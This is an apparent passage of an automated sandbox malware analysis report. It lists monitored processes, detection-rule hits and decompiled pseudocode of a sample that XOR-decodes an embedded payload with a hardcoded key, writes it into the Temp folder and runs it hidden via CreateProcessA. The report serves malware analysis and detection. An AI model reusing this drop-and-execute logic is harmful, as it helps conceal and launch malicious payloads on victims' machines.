                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                          Start time:04:38:06
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                          Imagebase:0x1130000
                                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                          Start time:04:38:32
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                                                                                                                                                                                                          Imagebase:0xc40000
                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          General

                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                          Start time:04:38:39
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
                                                                                                                                                                                                                          Imagebase:0xc40000
                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:64.4%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:4.8%
                                                                                                                                                                                                                            Total number of Nodes:42
                                                                                                                                                                                                                            Total number of Limit Nodes:2
                                                                                                                                                                                                                            execution_graph 112 401483 _XcptFilter 81 4014a5 memset SetUnhandledExceptionFilter __set_app_type _controlfp __getmainargs 84 40142f 81->84 83 401548 exit 85 40144a 84->85 88 401193 85->88 87 401473 87->83 106 401000 strlen malloc 88->106 93 40122b 94 401381 93->94 95 40124e getenv 93->95 94->87 96 401000 2 API calls 95->96 97 4012a1 sprintf 96->97 98 401000 2 API calls 97->98 99 4012f3 98->99 111 40109f fopen fwrite fclose 99->111 101 401317 102 401379 101->102 103 401000 2 API calls 101->103 102->87 104 401347 sprintf 103->104 105 4010ec 5 API calls 104->105 105->102 107 401048 106->107 108 4010ec memset memset CreateProcessA 107->108 109 401170 CloseHandle CloseHandle 108->109 110 40118c memset memset 108->110 109->110 110->93 111->101 113 401556 _controlfp 114 401193 15 API calls 113->114 115 4015b0 114->115 116 40123f 117 40122b 116->117 118 40124e getenv 116->118 117->118 119 401381 117->119 120 401000 2 API calls 118->120 121 4012a1 sprintf 120->121 122 401000 2 API calls 121->122 123 4012f3 122->123 130 40109f fopen fwrite fclose 123->130 125 401317 126 401000 2 API calls 125->126 129 401379 125->129 127 401347 sprintf 126->127 128 4010ec 5 API calls 127->128 128->129 130->125

                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 004014A5 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                                            			_entry_() {
				void _v8;
				intOrPtr* _v12;
				int _t25;

				memset( &_v8, 0, 4);
				SetUnhandledExceptionFilter(E00401483);
				_push(1);
				L00401618();
				_push(0x30000);
				_push(0x10000);
				L00401620();
				_v12 = __imp____argc;
				_push( &_v8);
				_push( *0x539000);
				_push(__imp___environ);
				_push(__imp____argv);
				_push(_v12);
				L00401628();
				_v12 = __imp____argc;
				_t25 = E0040142F( *_v12,  *__imp____argv,  *__imp___environ); // executed
				exit(_t25); // executed
				return _t25;
			}






                                                                                                                                                                                                                            0x004014bf
                                                                                                                                                                                                                            0x004014cd
                                                                                                                                                                                                                            0x004014d7
                                                                                                                                                                                                                            0x004014d8
                                                                                                                                                                                                                            0x004014e5
                                                                                                                                                                                                                            0x004014eb
                                                                                                                                                                                                                            0x004014ec
                                                                                                                                                                                                                            0x00401506
                                                                                                                                                                                                                            0x0040150c
                                                                                                                                                                                                                            0x00401513
                                                                                                                                                                                                                            0x00401514
                                                                                                                                                                                                                            0x00401515
                                                                                                                                                                                                                            0x00401519
                                                                                                                                                                                                                            0x0040151a
                                                                                                                                                                                                                            0x00401534
                                                                                                                                                                                                                            0x00401543
                                                                                                                                                                                                                            0x0040154c
                                                                                                                                                                                                                            0x00401555

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3649950142-0
                                                                                                                                                                                                                            • Opcode ID: 306bfeee29cfac2267a084103dcadb822dcfbe0d1eff0ee721aad76adfaa38c9
                                                                                                                                                                                                                            • Instruction ID: 3a75800fd6015d03e9ab69df35ae10412dacb439bc0b652db34ec73a0e271524
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 306bfeee29cfac2267a084103dcadb822dcfbe0d1eff0ee721aad76adfaa38c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 021112F5E002046BCB44EBA8EC85F5A77BCA758304F144879F805E73A1E939EA488765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401193 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401193() {
				intOrPtr _v8;
				intOrPtr _v12;
				void _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				char _v1292;
				char _v2552;
				signed int _v2556;
				char* _v2560;
				void* _t74;
				void* _t120;
				void* _t124;

				E004010EC(0, E00401000(0x402024, 0xf8)); // executed
				memset( &_v16, 0, 0xc);
				_v16 = 0x40211d;
				_v12 = 0x402122;
				_v8 = 0x402133;
				memset( &_v32, 0, 0x10);
				_t124 = _t120 + 0x28;
				_v32 = 0x10;
				_v28 = 1;
				_v24 = 0x136200;
				_v2556 = 0;
				while(_v2556 < 1) {
					_v2560 = getenv( *( &_v16 + _v2556 * 0xc));
					sprintf( &_v1292, 0x538334, _v2560, E00401000(( &_v16 + _v2556 * 0xc)[1],  *((intOrPtr*)( &_v32 + (_v2556 << 4)))));
					_t74 = E00401000(( &_v16 + _v2556 * 0xc)[2],  *((intOrPtr*)( &_v32 + (_v2556 << 4) + 8))); // executed
					E0040109F( &_v1292, _t74,  *((intOrPtr*)( &_v32 + (_v2556 << 4) + 8))); // executed
					_t124 = _t124 + 0x30;
					if( *((intOrPtr*)( &_v32 + (_v2556 << 4) + 4)) != 0) {
						sprintf( &_v2552, "%s \"\" \"%s\"", E00401000(0x538345, 0xd),  &_v1292);
						E004010EC(0,  &_v2552); // executed
						_t124 = _t124 + 0x20;
					}
					_v2556 = _v2556 + 1;
				}
				return 0;
			}
















                                                                                                                                                                                                                            0x004011b8
                                                                                                                                                                                                                            0x004011d0
                                                                                                                                                                                                                            0x004011dd
                                                                                                                                                                                                                            0x004011e5
                                                                                                                                                                                                                            0x004011ed
                                                                                                                                                                                                                            0x00401200
                                                                                                                                                                                                                            0x00401205
                                                                                                                                                                                                                            0x0040120d
                                                                                                                                                                                                                            0x00401215
                                                                                                                                                                                                                            0x0040121d
                                                                                                                                                                                                                            0x00401225
                                                                                                                                                                                                                            0x0040122b
                                                                                                                                                                                                                            0x0040128b
                                                                                                                                                                                                                            0x004012b9
                                                                                                                                                                                                                            0x004012ee
                                                                                                                                                                                                                            0x00401312
                                                                                                                                                                                                                            0x00401317
                                                                                                                                                                                                                            0x00401330
                                                                                                                                                                                                                            0x0040135f
                                                                                                                                                                                                                            0x00401374
                                                                                                                                                                                                                            0x00401379
                                                                                                                                                                                                                            0x00401379
                                                                                                                                                                                                                            0x00401246
                                                                                                                                                                                                                            0x00401246
                                                                                                                                                                                                                            0x00401387

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401000: strlen.MSVCRT ref: 00401016
                                                                                                                                                                                                                              • Part of subcall function 00401000: malloc.MSVCRT ref: 00401026
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            • memset.MSVCRT ref: 004011D0
                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401200
                                                                                                                                                                                                                            • getenv.MSVCRT ref: 00401264
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 004012B9
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fopen.MSVCRT ref: 004010B3
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fwrite.MSVCRT ref: 004010D0
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fclose.MSVCRT ref: 004010DF
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040135F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$CloseHandlesprintf$CreateProcessfclosefopenfwritegetenvmallocstrlen
                                                                                                                                                                                                                            • String ID: "!@$$ @$%s "" "%s"$%s\%s$3!@$Temp
                                                                                                                                                                                                                            • API String ID: 1612466341-405523733
                                                                                                                                                                                                                            • Opcode ID: a6a698ba76dac6e8dbd8dd0450d1d6d27ecad77ed7286cff01d4059f278791b2
                                                                                                                                                                                                                            • Instruction ID: ddd26f67f9fce1da615c8cf7e772ab87997cd42ef7c819f88f068c8a881685b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6a698ba76dac6e8dbd8dd0450d1d6d27ecad77ed7286cff01d4059f278791b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A5141F1E001099BEB54DB9CDC41FAE73ADDB44309F0445BAF419F7392EA38AA848B54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040123F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040123F() {
				void* _t47;
				void* _t91;

				L0:
				while(1) {
					L0:
					 *(_t91 - 0x9f8) =  *(_t91 - 0x9f8) + 1;
					if( *(_t91 - 0x9f8) >= 1) {
						break;
					}
					L2:
					L3:
					 *((intOrPtr*)(_t91 - 0x9fc)) = getenv( *(_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc));
					sprintf(_t91 - 0x508, 0x538334,  *((intOrPtr*)(_t91 - 0x9fc)), E00401000((_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc)[1],  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4)))));
					_t47 = E00401000((_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc)[2],  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 8))); // executed
					E0040109F(_t91 - 0x508, _t47,  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 8))); // executed
					if( *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 4)) != 0) {
						sprintf(_t91 - 0x9f4, "%s \"\" \"%s\"", E00401000(0x538345, 0xd), _t91 - 0x508);
						E004010EC(0, _t91 - 0x9f4); // executed
					}
					L5:
				}
				L6:
				return 0;
			}





                                                                                                                                                                                                                            0x0040123f
                                                                                                                                                                                                                            0x0040123f
                                                                                                                                                                                                                            0x0040123f
                                                                                                                                                                                                                            0x00401246
                                                                                                                                                                                                                            0x00401234
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040123a
                                                                                                                                                                                                                            0x0040124e
                                                                                                                                                                                                                            0x0040128b
                                                                                                                                                                                                                            0x004012b9
                                                                                                                                                                                                                            0x004012ee
                                                                                                                                                                                                                            0x00401312
                                                                                                                                                                                                                            0x00401330
                                                                                                                                                                                                                            0x0040135f
                                                                                                                                                                                                                            0x00401374
                                                                                                                                                                                                                            0x00401379
                                                                                                                                                                                                                            0x0040137c
                                                                                                                                                                                                                            0x0040137c
                                                                                                                                                                                                                            0x00401381
                                                                                                                                                                                                                            0x00401387

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • getenv.MSVCRT ref: 00401264
                                                                                                                                                                                                                              • Part of subcall function 00401000: strlen.MSVCRT ref: 00401016
                                                                                                                                                                                                                              • Part of subcall function 00401000: malloc.MSVCRT ref: 00401026
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 004012B9
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fopen.MSVCRT ref: 004010B3
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fwrite.MSVCRT ref: 004010D0
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fclose.MSVCRT ref: 004010DF
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040135F
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandlememsetsprintf$CreateProcessfclosefopenfwritegetenvmallocstrlen
                                                                                                                                                                                                                            • String ID: %s "" "%s"$%s\%s
                                                                                                                                                                                                                            • API String ID: 29280083-2882565225
                                                                                                                                                                                                                            • Opcode ID: fc8c38f793bc2ef48c1ce623ce7ecbf072c9cb9eb44e7a571caf3f9457dd4aa9
                                                                                                                                                                                                                            • Instruction ID: 5c656854deae039cce70bbff5f12d1a06f7a4f27785052f6a30d2ba00a044d21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc8c38f793bc2ef48c1ce623ce7ecbf072c9cb9eb44e7a571caf3f9457dd4aa9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD3150F1E011169BEB58DB98CC91FBE73B9EB44305F0445B9F016F7252EA38AA84CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004010EC Relevance: 7.6, APIs: 5, Instructions: 56processCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 41 4010ec-40116a memset * 2 CreateProcessA 42 401170-401187 CloseHandle * 2 41->42 43 40118c 41->43 44 401191-401192 42->44 43->44
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004010EC(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				int _t29;

				memset( &_v88, 0, 0x44);
				memset( &_v20, 0, 0x10);
				_v88.cb = 0x44;
				_t29 = CreateProcessA(_a4, _a8, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
				if(_t29 == 0) {
					return 0;
				}
				CloseHandle(_v20);
				CloseHandle(_v20.hThread);
				return 1;
			}






                                                                                                                                                                                                                            0x00401106
                                                                                                                                                                                                                            0x0040111e
                                                                                                                                                                                                                            0x0040112b
                                                                                                                                                                                                                            0x00401162
                                                                                                                                                                                                                            0x0040116a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040118c
                                                                                                                                                                                                                            0x00401174
                                                                                                                                                                                                                            0x0040117d
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandlememset$CreateProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808871499-0
                                                                                                                                                                                                                            • Opcode ID: 3a54ed037061dab525dbd650e8bbdaa9cbf831eb218dd4639b6558646f997316
                                                                                                                                                                                                                            • Instruction ID: fbed1b3901432369c809b4390b2605daaf7d3aaa2b2321e4495c261506c4ab80
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a54ed037061dab525dbd650e8bbdaa9cbf831eb218dd4639b6558646f997316
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D0196B6A001087BEB50D6ECCC45F9B73AC9B48344F244436B61AFB2D1E53CE94487A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040109F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 45 40109f-4010eb fopen fwrite fclose
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040109F(char* _a4, void* _a8, int _a12) {
				struct _IO_FILE* _v8;
				int _v12;
				struct _IO_FILE* _t11;
				int _t16;

				_t11 = fopen(_a4, "wb"); // executed
				_v8 = _t11;
				_t16 = fwrite(_a8, _a12, 1, _v8); // executed
				_v12 = _t16;
				fclose(_v8); // executed
				return _v12;
			}







                                                                                                                                                                                                                            0x004010b3
                                                                                                                                                                                                                            0x004010bb
                                                                                                                                                                                                                            0x004010d0
                                                                                                                                                                                                                            0x004010d8
                                                                                                                                                                                                                            0x004010df
                                                                                                                                                                                                                            0x004010eb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: fclosefopenfwrite
                                                                                                                                                                                                                            • String ID: ! @
                                                                                                                                                                                                                            • API String ID: 699583605-630624503
                                                                                                                                                                                                                            • Opcode ID: 218f2faaa4636afcb94cea61386515247506180f3d78cbfdf009abea41c2d677
                                                                                                                                                                                                                            • Instruction ID: b5f4748816796eb7b9a6c2adde2f6661763ad3dc1d466896b85c981b43dabe2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 218f2faaa4636afcb94cea61386515247506180f3d78cbfdf009abea41c2d677
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0A5F5E00208BBDF50EAADDD86E8E77ECAB08304F004465F909E7281E638EA548765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00401000 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 57stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 46 401000-401045 strlen malloc 47 401048-401050 46->47 48 401056-401098 47->48 49 40109a-40109e 47->49 48->47
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00401000(intOrPtr _a4, intOrPtr _a8) {
				char* _v8;
				int _v12;
				void* _v16;
				signed int _v20;
				char* _v24;
				signed char* _v28;
				void* _t34;

				_v8 = "=wd91b(abwhpyy0ahk/uujs72.pb.:n9";
				_v12 = strlen(_v8);
				_t34 = malloc(_a8 + 1); // executed
				_v16 = _t34;
				 *((char*)(_v16 + _a8)) = 0;
				_v20 = 0;
				while(_v20 < _a8) {
					_v24 = _v16 + _v20;
					_v28 = _a4 + _v20;
					asm("cdq");
					 *_v24 =  *_v28 ^ _v8[_v20 % _v12];
					_v20 = _v20 + 1;
				}
				return _v16;
			}










                                                                                                                                                                                                                            0x0040100f
                                                                                                                                                                                                                            0x0040101e
                                                                                                                                                                                                                            0x00401026
                                                                                                                                                                                                                            0x0040102e
                                                                                                                                                                                                                            0x0040103e
                                                                                                                                                                                                                            0x00401045
                                                                                                                                                                                                                            0x00401048
                                                                                                                                                                                                                            0x00401077
                                                                                                                                                                                                                            0x0040107d
                                                                                                                                                                                                                            0x00401080
                                                                                                                                                                                                                            0x00401096
                                                                                                                                                                                                                            0x0040105f
                                                                                                                                                                                                                            0x0040105f
                                                                                                                                                                                                                            0x0040109e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • =wd91b(abwhpyy0ahk/uujs72.pb.:n9, xrefs: 0040100A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: mallocstrlen
                                                                                                                                                                                                                            • String ID: =wd91b(abwhpyy0ahk/uujs72.pb.:n9
                                                                                                                                                                                                                            • API String ID: 770973918-3890356719
                                                                                                                                                                                                                            • Opcode ID: 02f93a43be42bd8e7080bbc0469d4024ec066242a770b7b48e3d2893a50011d7
                                                                                                                                                                                                                            • Instruction ID: 126bdaef979334948cc799e95c619292300e0bd5fddb62597c62829b26c3098e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02f93a43be42bd8e7080bbc0469d4024ec066242a770b7b48e3d2893a50011d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14112EB0E00249DFCF04CFACC891AAEBBF1AF49304F14846AE456F7391D634AA05CB55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040142F Relevance: 2.5, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 52 40142f-401482 call 401388 call 401193 call 4013e4
                                                                                                                                                                                                                            C-Code - Quality: 58%
